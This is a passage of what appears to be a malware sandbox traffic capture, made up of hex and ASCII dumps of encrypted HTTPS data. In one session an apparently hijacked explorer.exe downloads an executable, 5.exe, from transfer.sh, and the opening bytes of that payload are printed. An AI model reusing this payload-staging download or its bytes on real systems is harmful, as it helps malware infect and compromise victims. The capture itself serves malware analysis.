                                                                                                                                                                                                    Data Ascii: i#x|];J6mw$pB.zI *kF_4wCt?$'->O[F2\ hd<1%=wFpt`o%h"0kK.@8ZC,#!hJe#%ZbJP&|eC s)`VP
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC3833INData Raw: 49 5e 58 b9 9c 73 10 0a 00 5c 26 60 09 42 eb 51 8d fc 7e 7d f3 00 3c 18 e0 69 8a 46 95 54 f8 11 00 06 3e 13 a8 5c 1e 43 6c 3d ca 4b 87 10 9c f2 3a 59 80 05 2e 29 b4 e5 00 c3 db 32 17 04 19 3c b3 3c 46 bb 01 e2 27 18 f9 a2 5a 60 b6 71 00 8b 43 79 04 31 78 ca 4c 92 03 01 58 4d 32 76 13 61 47 dc 2e 7c 90 00 03 39 36 d8 cd 6a 1b b8 5f b5 b6 00 8e 3e a5 04 5a 4d 58 8f 00 d4 e2 05 29 0a d3 93 cb f4 bf 01 12 15 4c 1a 46 b3 50 30 e2 e9 1d 0d 25 bc 03 54 ea 13 dc 80 40 05 03 00 80 78 84 22 10 01 3e 50 00 07 df f0 d2 09 bd 70 d7 98 17 00 e9 35 0a 61 1d 78 20 7a 0f 58 42 1a c6 80 44 29 9f 72 01 e3 30 f3 fa 9d 78 54 00 bd 68 2e 82 95 73 19 06 7c 9b 00 44 af c3 89 d4 11 29 1a 1f 18 e5 cc d3 f6 0e 08 ce be 41 90 50 51 88 8f 30 57 42 01 b8 f0 e8 e1 4c f3 1c 30 00 75 3c
                                                                                                                                                                                                    Data Ascii: I^Xs\&`BQ~}<iFT>\Cl=K:Y.)2<<F'Z`qCy1xLXM2vaG.|96j_>ZMX)LFP0%T@x">Pp5ax zXBD)r0xTh.s|D)APQ0WBL0u<
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC3849INData Raw: 5e 1e fa 6c 3a d4 d9 1f ea b8 80 18 8a 85 a1 ed 84 77 c0 00 8d 7e 0c 0a 75 13 97 fd 00 91 f6 54 2a 81 dc 85 b5 00 83 31 ff d2 eb 10 29 27 28 07 12 f8 00 4a 97 44 fb dd 38 92 91 07 f2 05 ad ee 0a 10 29 47 e4 0c 39 54 85 00 86 87 91 56 92 09 18 00 80 77 ca 39 ff fa 2b 44 00 4c 90 93 e8 12 d9 20 ea f4 d3 00 0f e2 b6 3e 40 03 b2 74 02 79 87 19 d6 6e c9 80 be c2 27 0c 48 03 ba 03 75 7f 50 da c0 45 aa 9a 00 22 e5 d2 ee 32 21 f0 e8 1c 26 74 0d c0 8b ce 06 64 7f 22 f9 40 d8 fd 28 f7 13 2b c6 5a 00 55 92 0b 19 04 1b 03 94 2c a2 be 31 05 d7 57 ea 50 06 0a f0 f8 90 04 00 55 0c c9 20 51 6c 56 87 00 2b 2f d5 f7 11 59 c8 7e 00 cd 66 55 c2 39 3b 3f 28 00 d0 d8 f4 73 4e 0c aa c8 00 dd 5c 48 83 03 a2 d3 7d 0f 7e 54 59 f8 41 89 71 25 8d 20 e9 e4 00 14 26 8a 9f db 65 5d a8
                                                                                                                                                                                                    Data Ascii: ^l:w~uT*1)'(JD8)G9TVw9+DL >@tyn'HuPE"2!&td"@(+ZU,1WPU QlV+/Y~fU9;?(sN\H}~TYAq% &e]
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC3865INData Raw: 52 74 05 03 64 42 57 90 54 22 30 3e 08 0a 77 28 b0 5f 12 a8 c1 72 33 62 ac 1e 91 a0 d3 2e 18 0f 94 b0 7e 11 f8 a4 84 04 78 23 00 6a 40 58 75 13 10 20 70 fe 6e 00 67 ae 5e 9a 74 57 64 60 75 b2 00 24 10 4e 0c b1 f8 c8 63 03 28 50 18 2a 22 08 c8 03 e8 94 00 57 04 64 29 14 10 05 54 07 6a 4c 7c 2b c8 b0 da 85 20 24 76 2a 3d c4 50 80 07 0b 54 14 68 d2 d8 f6 82 60 5a 22 b4 58 52 4c 04 10 cc 2c 19 3a c2 69 04 60 4e 91 ec 07 3e fc 65 59 2d 20 c4 11 02 74 00 4a fe e6 b8 ce 1d 08 94 14 72 06 50 a6 00 73 df 98 f2 aa cc 85 07 64 07 39 13 48 60 60 22 10 40 7a 05 00 43 6c 61 73 c7 99 38 24 74 58 00 74 2f 0f c5 49 26 71 03 fe 41 00 64 61 70 7b 5a 60 80 51 0e 01 34 2f 9c 9f c0 ec 52 d0 11 9e a6 00 c0 20 af 14 3d 82 da 37 3e a2 f0 60 16 60 25 74 80 fe e0 3b 09 72 80 30 ec
                                                                                                                                                                                                    Data Ascii: RtdBWT"0>w(_r3b.~x#j@Xu png^tWd`u$Nc(P*"Wd)TjL|+ $v*=PTh`Z"XRL,:i`N>eY- tJrPsd9H``"@zClas8$tXt/I&qAdap{Z`Q4/R =7>``%t;r0
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC3881INData Raw: 8c 85 e0 08 ac 00 58 93 97 04 a4 32 c0 d4 00 42 c2 a0 19 49 8a bf 6c 00 7a 27 90 61 24 e0 d9 ea 37 e1 78 16 90 f0 52 38 b9 7c c9 00 74 54 1e b5 87 64 e9 41 1f 09 3c 1b 5f 4e 40 0c b2 f0 11 2c 3d 00 25 de 9d 45 96 a7 43 b6 e8 3e 00 a3 93 ae a2 16 d4 68 19 ee b0 00 30 02 40 27 41 84 1a ec 00 76 25 bd 85 4c 06 a0 20 1f 2c e8 55 00 bb f1 43 cd 7e 92 01 41 49 b0 f0 75 82 71 60 80 76 00 50 ba 62 5a 09 c2 9a a2 00 d6 8e 26 46 1c cf ac 40 fd c8 02 51 00 9c 13 21 c3 a2 8a a3 bf 00 b0 0b 31 61 e4 b4 9a 36 00 4f 04 0e 86 47 89 74 a7 00 26 ec a1 32 34 6d c9 ad 24 3b 0b 79 07 41 b0 d0 b0 12 1f 9d 87 00 32 e4 61 05 39 91 3a 0e 00 f2 e7 cb f7 71 24 17 1c 2e c2 1e 98 00 d0 18 cc d9 1d 3b 00 ff c9 c7 24 04 1c e4 2e 09 98 fd ed 97 80 68 4f c6 d0 cf 00 f5 cd 12 f1 c2 ca de
                                                                                                                                                                                                    Data Ascii: X2BIlz'a$7xR8|tTdA<_N@,=%EC>h0@'Av%L ,UC~AIuq`vPbZ&F@Q!1a6OGt&24m$;yA2a9:q$.;$.hO
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC3897INData Raw: de 20 d9 b6 f8 a6 19 14 04 d3 21 3e 89 33 99 41 0b e9 38 3a 83 2c e8 26 16 e9 11 ca 46 7a 9d b8 c1 c1 82 4d af a0 19 e9 f9 03 12 52 7b 3e 79 88 09 eb f7 5c ee 77 c8 8e e3 a7 94 e2 e5 95 17 61 61 cb ea 2f a5 68 be a5 93 3a 61 7a 6f ff 24 4a c1 67 00 f2 98 c0 48 34 e0 3b aa a0 21 78 81 6f 10 76 ba 24 ca f9 25 9b 5a ad d9 a3 4c da 9c 7b d2 44 cc 19 df 86 62 14 47 eb ab fd 8a 26 83 8f e6 4d a8 f3 59 e9 c6 19 94 25 40 65 d5 7f f8 44 52 ee 7d 37 54 09 58 eb 02 16 98 fc 78 91 ff f9 75 6a dc 22 9d d1 b4 cb 63 95 e8 68 79 d8 19 55 81 d4 79 f1 02 30 cf f9 7f cb fc ac 66 3e 44 1d 27 7b 4a ef d3 e6 61 8e 43 0d b9 06 69 28 9e 05 73 f4 ae f9 5f 10 74 95 08 fe b9 d4 c4 8f 5b 30 9f ba 7b 9f 68 08 09 26 f6 e0 ce c5 6e 2c b8 8b ef dc 28 b0 5b b2 2a f5 3b a2 c9 04 b0 ca dd
                                                                                                                                                                                                    Data Ascii: !>3A8:,&FzMR{>y\waa/h:azo$JgH4;!xov$%ZL{DbG&MY%@eDR}7TXxuj"chyUy0f>D'{JaCi(s_t[0{h&n,([*;
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC3913INData Raw: f9 83 23 86 a4 d4 76 6d 93 48 2d 20 ea 86 25 08 db ff 03 ad 2b b9 43 c4 ae 70 5e cc 40 0c 2a d0 fd 82 01 6a 17 3b b5 24 25 0f 4f 57 ad 3a ff 0c d1 9e 97 cd 7f 94 9a f2 d8 ac b0 50 97 a4 41 3c 95 15 66 3c 94 e5 34 ac 2c 19 41 6d ec b0 d6 aa cf 15 5a 2a 05 33 f1 ee b0 06 c8 ad 70 b2 eb 3c 74 56 d4 df 86 9d 9a f6 68 59 70 2f 46 a8 2c 92 f9 6b 72 14 fc 4f df 74 92 5e 14 6f 87 70 f3 5b c4 fd f7 87 fd 4c 62 a6 45 b2 02 87 2f 1c 78 c5 b7 9a 84 cf 35 46 46 f2 0f d0 5b ec cd ad f3 25 de f8 7d 71 1a f1 83 3f 22 f2 ff 7b 6d 36 a8 5a 47 73 7a 16 0d 95 b4 01 9a fb db ee fc c8 b7 ab 3c 70 72 5c a0 25 a5 91 10 21 07 b1 73 4c 8c 05 cc a5 72 58 fa f2 bd d1 97 6a 33 03 33 b3 b6 54 25 1d ed 6e a3 06 5f 15 10 2c ea 9f 1a 18 44 51 53 97 88 88 a3 bf 7f 52 77 15 ff 4b ce 8c ea
                                                                                                                                                                                                    Data Ascii: #vmH- %+Cp^@*j;$%OW:PA<f<4,AmZ*3p<tVhYp/F,krOt^op[LbE/x5FF[%}q?"{m6ZGsz<pr\%!sLrXj33T%n_,DQSRwK
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC3929INData Raw: a2 66 0e c5 2c 03 e4 1b 65 df a0 56 bc b2 4e f4 da e6 4f 0d 5f 11 ec d6 06 97 cc 86 59 8a f9 8b d4 b7 5e 7d fa da d8 fe ab d1 af 00 4b b8 ff 6e 3b d2 f5 b8 70 ad 2b 81 56 c6 96 b9 07 1c 10 94 8a db 60 bf d0 5f 40 1d 38 81 90 dd 60 30 87 a8 19 49 e8 f5 1e d5 de 2a b5 f4 0b a4 b7 1b 09 fd e4 a7 36 21 12 3b 0c d8 2a 88 80 b3 b7 e8 c8 44 b5 44 e4 e5 41 76 7a 36 a0 a0 41 75 9a cc a5 e5 5d ed a2 e5 38 61 68 1b 15 52 e7 95 f0 63 ee b5 6a a1 29 3d 47 17 7b 9d 2c 52 2a a1 b2 35 50 81 1e 99 a5 37 a8 0f f1 af da e1 e2 8c 99 3b 5f 00 a4 1e bf 57 6b 93 e8 78 95 f5 d7 72 91 db d4 87 93 cd 6d 14 45 34 3a c9 77 2a 63 9e f6 6a 9e 15 38 ac 86 24 a7 55 34 13 42 63 1e 2e c6 c0 71 2b 02 5f cc 93 49 6e cc e2 ac b9 cd 7d c5 73 05 4e d5 6d de 9d 86 b2 4f 15 3d c3 86 d8 24 9f 39
                                                                                                                                                                                                    Data Ascii: f,eVNO_Y^}Kn;p+V`_@8`0I*6!;*DDAvz6Au]8ahRcj)=G{,R*5P7;_WkxrmE4:w*cj8$U4Bc.q+_In}sNmO=$9
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC3945INData Raw: 24 30 85 ae 1a a2 67 54 92 e0 6f 78 2b 3f d9 46 64 40 5d 40 be 1c 75 f2 40 16 c1 ad 51 9b 54 c7 fe fb 01 5f 10 61 b5 4c 64 7d 74 f3 38 de 37 fc f3 18 50 00 b1 36 ab 0f 17 96 f4 61 4d 43 04 3c 7b e5 b1 cc 7a 2a d7 f1 81 29 98 bc 4c 4f ea 94 39 ac 5a a4 93 80 a5 ee 77 43 06 67 e6 4f b6 e2 c0 55 c5 ec 34 d3 73 82 4a b8 d8 46 eb 0f a9 06 58 d8 87 d9 6f 93 23 05 3d fb e9 6a b6 b6 22 fe c5 fc 92 0f 3e 46 c5 b0 b8 2d 90 9c ac 5e 82 5b d1 db 33 2c 81 06 94 ae 11 7d fe c3 e9 88 ff 51 1c 5e 90 93 95 2b e3 5a e2 ae f1 03 09 3c 00 6c 61 3a a9 63 b3 8e 3a 3f 63 8a 90 e3 47 8a e2 32 83 ad 0a 79 5a 0d ae f6 0f 2f 11 99 d8 64 53 df 7e 80 88 da f0 e1 d3 97 49 e2 18 6c fe 05 15 ca fc 42 07 55 81 e2 68 98 b9 bc b8 7c e5 62 83 07 9d 6a 7e 10 5a 98 21 76 33 fc f8 bc aa c8 47
                                                                                                                                                                                                    Data Ascii: $0gTox+?Fd@]@u@QT_aLd}t87P6aMC<{z*)LO9ZwCgOU4sJFXo#=j">F-^[3,}Q^+Z<la:c:?cG2yZ/dS~IlBUh|bj~Z!v3G
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC3961INData Raw: 72 ac b7 2b 07 4a c3 a6 1b 89 08 84 2c fc d8 95 80 4e f5 ec a6 f6 85 75 c1 1f 01 6c c1 b1 49 ef 53 f5 b9 88 f2 5c a3 f3 49 9f b0 ee 42 c2 b7 38 9b be c4 be 47 09 67 b0 e6 b0 76 3e 24 b4 5c 9d 9b 76 6f 9a 5b 00 18 de 71 4b f9 33 d2 9b d5 e3 d5 d8 b4 da 0f 0a 1d d6 e2 39 df 93 b8 e8 36 d2 82 1c cf 0f e4 f4 a4 8e 6e 19 04 4d d0 51 ba a1 91 d4 0e 3e d8 02 ca 55 f4 1d 8f 52 95 bb ef 76 8e 82 7a a9 32 04 e8 6c 7d 46 51 e7 a9 39 ce 56 2d 67 76 3c 06 e2 6b a4 4c 39 aa b7 19 f7 db c4 c1 3a ee 7c 1c b3 b8 9a cb c6 41 3b 8f f3 21 64 3f 5c 6c be a3 1c 05 94 c8 fc 01 55 3b 92 9c 9e 66 44 7f ed 38 16 95 5a a4 ca ac 12 f0 31 25 2a 73 a3 ad 13 e1 ea 23 78 fc 85 fb fc e9 42 9f 61 40 ed 2e 94 fd 9e e1 02 5d d7 a9 a8 83 72 9b 20 d2 a1 e6 30 69 6c 08 50 e3 29 c8 95 d1 0e 0a
                                                                                                                                                                                                    Data Ascii: r+J,NulIS\IB8Ggv>$\vo[qK396nMQ>URvz2l}FQ9V-gv<kL9:|A;!d?\lU;fD8Z1%*s#xBa@.]r 0ilP)
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC3977INData Raw: f6 f0 8d ba 05 b6 58 6c e9 a7 8a 2f 3c 60 0e cd 83 e8 c4 1c e7 14 93 53 bb 19 bc ec aa c0 d2 2d 88 9d 99 62 84 54 c0 d1 22 cf a3 46 ec c9 3d 31 98 c5 07 24 62 51 c2 9c 05 ba 35 6e 4e 05 f0 8c bf 2f 1e 28 3e 6c 91 f2 8f 7a e9 87 62 1e 4e 8b 45 b7 5b 9f a5 9b a8 8c ac db 5d 45 b4 da 99 a6 7a ca 51 e1 40 f4 a2 3a 74 31 e9 f6 a9 59 62 15 58 10 54 38 a6 36 02 b9 72 cb 1a a4 4c ed 89 cc d2 8e 0f b9 48 f4 ba 7b 1c a6 d5 3f b3 2c ec 91 bd 30 88 5a a9 09 44 a7 a6 5c 51 a9 b7 42 67 f9 33 64 1b 5a 39 97 f6 d5 ee 9f 80 4c 4f 90 fb c2 88 ed 7c 98 8f 32 f4 2c 51 33 95 b2 c3 2b 43 88 0a 28 6c 54 e0 7b b9 ce 7a c3 a4 fc 52 c5 2c 04 69 12 ec da b8 51 67 92 ad 94 80 cd 22 28 01 43 c0 b7 fd 65 04 14 0d fc 50 e1 e6 c9 24 1b 30 a7 bb f1 80 76 cc 50 a1 97 d3 62 0f 3b e6 fe a4
                                                                                                                                                                                                    Data Ascii: Xl/<`S-bT"F=1$bQ5nN/(>lzbNE[]EzQ@:t1YbXT86rLH{?,0ZD\QBg3dZ9LO|2,Q3+C(lT{zR,iQg"(CeP$0vPb;
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC3993INData Raw: 77 0b 33 62 be ec 62 68 89 4d bd 7e 2d b1 00 3e 44 1b f5 a4 03 d9 50 b1 33 95 bd d5 2d b9 11 f8 68 a6 ac 5a 22 66 ee 89 f1 4c 3b 30 9d 79 86 9d 3c f2 5b e3 33 b0 f0 a8 fa b9 27 6e f9 6f 41 bb 41 a2 a6 99 bb 5f 5e bd 0d ca f5 99 fc 3c e3 92 4c f4 87 b9 33 bd 84 e5 2e 4d b5 82 87 23 2b 25 64 ec 68 53 d7 61 52 da fc d4 fc 41 09 73 b5 d8 1e 4b 66 ba 4a 54 11 41 fd c8 fb 81 05 b3 15 da fc e4 8a 95 c3 5f 9b c3 b6 a4 4b fb f4 bd 8f 8d 5e 77 57 5a 1f ef 52 77 5c ce e5 c9 22 d6 97 74 39 6a ba 0f c3 f2 31 3a 79 46 ff ff fc b8 77 a0 8f 2e eb a7 cd 40 ca 14 03 2a 16 2f 92 3b df 42 b4 2b a6 13 9b c7 6f a4 6e b7 e8 05 14 3c 3f 3b d8 91 f1 3a d9 03 5b 2f ca 0c a5 de 2d f5 bb 99 b4 62 8c 66 0e 52 5c 79 49 e2 49 99 36 e6 e7 3b 05 64 57 fc df ff fa c6 67 29 f2 ca 18 96 c8
                                                                                                                                                                                                    Data Ascii: w3bbhM~->DP3-hZ"fL;0y<[3'noAA_^<L3.M#+%dhSaRAsKfJTA_K^wWZRw\"t9j1:yFw.@*/;B+on<?;:[/-bfR\yII6;dWg)
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC4009INData Raw: 8e 02 64 7d a5 76 13 c0 a8 7d bc 57 12 e9 62 eb 14 7d a0 c9 bd 41 6a 4b 00 bc bc 83 4a 49 9e 1d b0 9d b2 21 81 03 6f c0 43 6e 66 02 63 57 3b 29 9c ed 4c b2 27 26 ac 24 9f 88 8f a2 62 0c 0b 2a 28 a0 6f d0 ff dc 12 90 f3 51 33 68 af 01 56 ca 54 27 19 3c 95 9a 77 6c 42 12 e1 31 fa 45 4d 28 24 1f 23 97 c8 77 11 f1 75 09 60 89 e9 24 6a 21 a0 a4 48 ed 66 c4 91 1c e4 bb 72 b8 cf 55 d6 d1 ca 68 21 45 dd e9 67 29 73 4b f0 1e 0a 9a 32 f3 74 cc bb dc 9b 58 af 40 91 f4 08 3a 91 8e d1 c5 1e 5e 01 74 94 24 65 9e 25 ca d5 61 45 05 ef ee c4 61 77 3d 2e 45 5a fa 6d bf 4f 81 f2 ce 79 5d 93 8b 47 06 4c a7 75 15 bc 20 37 0f da 7f fd 54 6b 8e 42 f1 5d 8e a7 3b 48 8a 8e 23 1a e2 86 83 52 9c 28 f1 22 7f 73 01 1e 43 f4 4d fd 74 1e f3 97 0d 10 bc 92 18 95 58 76 0b 19 0f 02 7c 86
                                                                                                                                                                                                    Data Ascii: d}v}Wb}AjKJI!oCnfcW;)L'&$b*(oQ3hVT'<wlB1EM($#wu`$j!HfrUh!Eg)sK2tX@:^t$e%aEaw=.EZmOy]GLu 7TkB];H#R("sCMtXv|
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC4025INData Raw: 30 df 3b fa 23 8c 73 17 b7 8d c3 54 35 15 20 32 10 da 43 fd 86 44 d0 89 32 6c 67 fe aa 29 68 c5 30 e8 ee 3f ab 7f 6b ae 04 32 d0 39 f9 72 c1 a2 68 6a 2b 79 67 bb 9f aa 58 e7 33 d1 1c 98 5b 04 b0 5f 63 88 11 33 af ab 08 aa 19 fb be 9f 94 89 f1 50 be 7f a1 b3 88 fc 4d c0 f0 d1 b1 22 df 8a cf 0e 36 3e 9a 54 f6 5b 50 dd 4d 99 82 0c 55 15 38 1d a1 9d a6 71 37 e5 a5 00 78 2d 2e c7 4b a6 d2 c5 97 f1 e0 62 58 24 83 52 78 64 5e d4 1c 94 d6 6b d8 54 a1 a9 29 64 30 91 ce b1 a8 96 77 2a 79 95 eb 76 0b 20 7b d2 6b c6 ff e7 c6 3b fb ea ba e2 26 b6 c9 44 c5 5b 9b 01 b3 c6 cb ce 32 44 73 16 db eb c9 3a 72 6d 0f eb 08 e1 d6 c9 28 60 05 5a 87 db da 3c 95 b5 c2 cf 7c 96 65 e5 ff ef 24 0b 58 0a 3c 36 88 4b 27 df 3c 44 79 e1 c2 c2 55 7c b5 5b 1c cd 9d 04 aa d9 ae 6a 18 63 1e
                                                                                                                                                                                                    Data Ascii: 0;#sT5 2CD2lg)h0?k29rhj+ygX3[_c3PM"6>T[PMU8q7x-.KbX$Rxd^kT)d0w*yv {k;&D[2Ds:rm(`Z<|e$X<6K'<DyU|[jc


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    5192.168.2.349884144.76.136.153443C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    2022-01-14 03:59:51 UTC4030OUTGET /get/uq3XSe/5.exe HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Host: transfer.sh
                                                                                                                                                                                                    2022-01-14 03:59:51 UTC4030INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx/1.14.2
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:59:51 GMT
                                                                                                                                                                                                    Content-Type: application/x-ms-dos-executable
                                                                                                                                                                                                    Content-Length: 3576320
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Content-Disposition: attachment; filename="5.exe"
                                                                                                                                                                                                    Retry-After: Fri, 14 Jan 2022 04:59:56 GMT
                                                                                                                                                                                                    X-Made-With: <3 by DutchCoders
                                                                                                                                                                                                    X-Ratelimit-Key: 127.0.0.1,84.17.52.18,84.17.52.18
                                                                                                                                                                                                    X-Ratelimit-Limit: 10
                                                                                                                                                                                                    X-Ratelimit-Rate: 600
                                                                                                                                                                                                    X-Ratelimit-Remaining: 9
                                                                                                                                                                                                    X-Ratelimit-Reset: 1642132796
                                                                                                                                                                                                    X-Remaining-Days: n/a
                                                                                                                                                                                                    X-Remaining-Downloads: n/a
                                                                                                                                                                                                    X-Served-By: Proudly served by DutchCoders
                                                                                                                                                                                                    2022-01-14 03:59:51 UTC4031INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 fa 8b e0 61 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0e 1d 00 24 02 00 00 ba 02 00 00 00 00 00 00 10 00 00 00 10 00 00 00 40 02 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 53 00 00 04 00 00 bb 21 37 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELa$@@S!7
                                                                                                                                                                                                    2022-01-14 03:59:51 UTC4046INData Raw: 5c 11 ac 72 40 cf b1 1f ec ab 46 b2 51 e6 ae 8d 43 98 27 86 e6 af 9b b0 a6 27 1c 35 90 95 c5 32 f0 09 fd ca c2 68 bd 21 95 5c bb 3d fa f2 09 8e 63 70 99 fd fe 66 6b a7 c9 47 2c 73 f5 bd 47 14 78 08 70 54 8b 71 85 77 ee 72 96 a5 98 b2 3c 1c c2 83 35 0e 58 5a e7 59 0c e3 12 71 12 6b 97 b5 a6 17 5f ce 4c 14 7c 15 4e c3 34 f9 f5 6a 65 c9 a4 1a 90 69 f5 3c d4 cd e9 3e 94 70 5d 06 98 ff d7 f9 b8 f7 8a f7 cf d4 41 15 1a 10 24 ec 44 4d 14 4e 9f ce 96 02 95 f1 e4 3b ad 3a d1 6c 04 de 64 a1 da 56 4a 42 4b 95 af 7d 1c dc df 5a 2f d5 ff 69 5d 8c 7d 3f 48 cd e2 f7 1e ed 02 6d a0 b6 a5 12 0f 84 e9 ff f9 5c 0a 8b b6 c6 e5 fb d8 af f0 52 85 2b b2 8a 2e 27 06 29 52 62 49 6a dc 1e ef 21 a0 c7 94 b5 c0 c3 ec a7 42 a1 2f 23 89 a4 53 63 b2 4d 6a 14 02 25 b3 c0 d0 ae cf e2 9a
                                                                                                                                                                                                    Data Ascii: \r@FQC''52h!\=cpfkG,sGxpTqwr<5XZYqk_L|N4jei<>p]A$DMN;:ldVJBK}Z/i]}?Hm\R+.')RbIj!B/#ScMj%
                                                                                                                                                                                                    2022-01-14 03:59:51 UTC4062INData Raw: b3 79 b2 0c 50 d9 b1 6b 57 1e 38 e9 eb ba 2b 4d 27 df ca c2 ff d7 32 5d 8f cf 08 89 4e c8 a8 51 77 65 9a ac 24 aa e1 94 95 12 24 a9 79 48 85 50 8a 1f 8d f8 20 00 8c 0d 89 f7 96 4c 9e 32 d7 1e 1e 70 3e a0 71 b3 e0 0c 13 5d 06 05 36 b0 39 02 24 10 36 b1 1a 95 6d 5d 97 ac e6 ac 52 53 3e de 18 c6 1a 32 cb df 70 22 1e 26 7a da 90 f0 41 93 e5 6b ef 87 e1 66 74 b2 2e f9 cb 9a 25 af 1f cf b4 a9 40 2c 06 09 d9 6d 7d 5c 2d 6d 23 de c5 ed 87 b2 51 90 fd 25 af 7e 99 db 55 32 f6 da 96 ac 7e 8e 6d 2f 7b e8 db 77 7a c1 fb 52 2c 0f a0 0e b7 3a d4 67 91 05 23 d4 11 0a 8a 81 f4 05 a0 a8 f1 cc 0f 33 0d 8c 36 14 69 6f 8a 70 0b 4c 8d f4 88 2d d0 7c 75 6a 86 f8 c0 55 b8 21 da c2 d8 d6 84 f0 48 e3 0b fa 85 32 89 a0 cd cd 87 8f 77 7a cd 16 29 82 18 70 65 35 dd 57 50 c1 7b d3 08
                                                                                                                                                                                                    Data Ascii: yPkW8+M'2]NQwe$$yHP L2p>q]69$6m]RS>2p"&zAkft.%@,m}\-m#Q%~U2~m/{wzR,:g#36iopL-|ujU!H2wz)pe5WP{
                                                                                                                                                                                                    2022-01-14 03:59:51 UTC4078INData Raw: 88 28 67 60 8e d0 d7 0b fd d2 5e 6b a8 9d 4c 79 9d 37 5d 99 6f 5c a6 23 08 6e 53 c5 8e c6 95 a4 ef 00 57 85 22 40 d6 c7 e7 f3 61 70 0b 96 3c b6 43 18 9c 0c d1 a5 27 3e ee 33 6c bd 99 34 6d 4e ca ab 6e f7 30 4d 54 fc a2 67 71 a1 5e 85 67 ba 2a e1 17 91 50 be b9 7c 30 db f6 83 b3 86 9b 54 c9 d7 82 35 49 7b f6 47 e7 0e 0e 8a 96 c4 77 51 eb d9 58 44 4b 7f 45 86 30 42 94 50 4b 2c 0c 7c c9 6c 83 06 9b 4d eb 22 5f c3 a6 8a f1 60 9d 3d 28 a9 a7 cf c8 54 82 b1 45 77 3e 3d 10 bd c2 6f 29 66 f7 02 84 73 bd 94 b5 bb 3b 7c 23 b7 76 5a 84 6a 4b bc df ab e9 14 d8 66 63 a8 e8 d5 83 5a 3c 30 a2 20 d8 86 3f 0b 60 9a ed 85 04 18 25 1c 1e ab 13 a7 0f 85 83 f8 47 c3 76 77 64 0b b2 a2 61 53 f8 5c 73 5b 2a b2 97 25 77 08 24 0d 73 c5 0f d9 1a 89 5f 95 41 6d bc 46 2f 4b 35 18 11
                                                                                                                                                                                                    Data Ascii: (g`^kLy7]o\#nSW"@ap<C'>3l4mNn0MTgq^g*P|0T5I{GwQXDKE0BPK,|lM"_`=(TEw>=o)fs;|#vZjKfcZ<0 ?`%GvwdaS\s[*%w$s_AmF/K5
                                                                                                                                                                                                    2022-01-14 03:59:51 UTC4094INData Raw: f0 a9 77 8b 4a 6c 7f 46 f6 88 8d 6b 49 bc f9 3e 03 7b 3e de 42 b8 bf 53 22 c5 51 cf 69 aa 06 18 32 71 e1 5d 41 20 a6 82 bd fa 3d 34 4a e5 85 c7 64 6f 24 3e ca d8 28 17 e4 16 8b a6 73 5b 4b a4 9b 56 4e de 3c 91 8f 3d c1 21 00 93 fc 50 ee b3 9a b5 84 df ce 44 fb 4c 08 3b 52 64 17 d9 ea d6 51 39 d1 6b 0f 03 4f c9 d3 a5 ef 32 c9 5f b5 a6 c6 58 54 ab a9 ad c4 1f 09 59 f1 7d 25 a0 39 17 5b 78 79 c3 7d 7e 4d 52 26 41 12 2e 73 a8 0f c7 9a 32 14 66 28 7f 8b 10 e4 28 49 ae 80 44 bd 02 ea 7d bd ed b1 0c 89 1b 22 c5 10 d0 3d f0 b2 a6 f8 45 a6 f0 b5 42 c8 0b 2e f5 92 3c 17 97 42 7d 57 b4 36 91 a8 1f c6 63 b5 3e 13 94 5a 77 a5 56 a5 18 71 93 fa 9a c2 6e 1a 26 1d 6c d3 d9 66 31 be 82 4b 72 40 c9 5b 08 53 54 49 ed 50 b3 ae 97 d0 6f a9 61 b4 1e fd 93 53 3a 8c e0 ce 43 1b
                                                                                                                                                                                                    Data Ascii: wJlFkI>{>BS"Qi2q]A =4Jdo$>(s[KVN<=!PDL;RdQ9kO2_XTY}%9[xy}~MR&A.s2f((ID}"=EB.<B}W6c>ZwVqn&lf1Kr@[STIPoaS:C
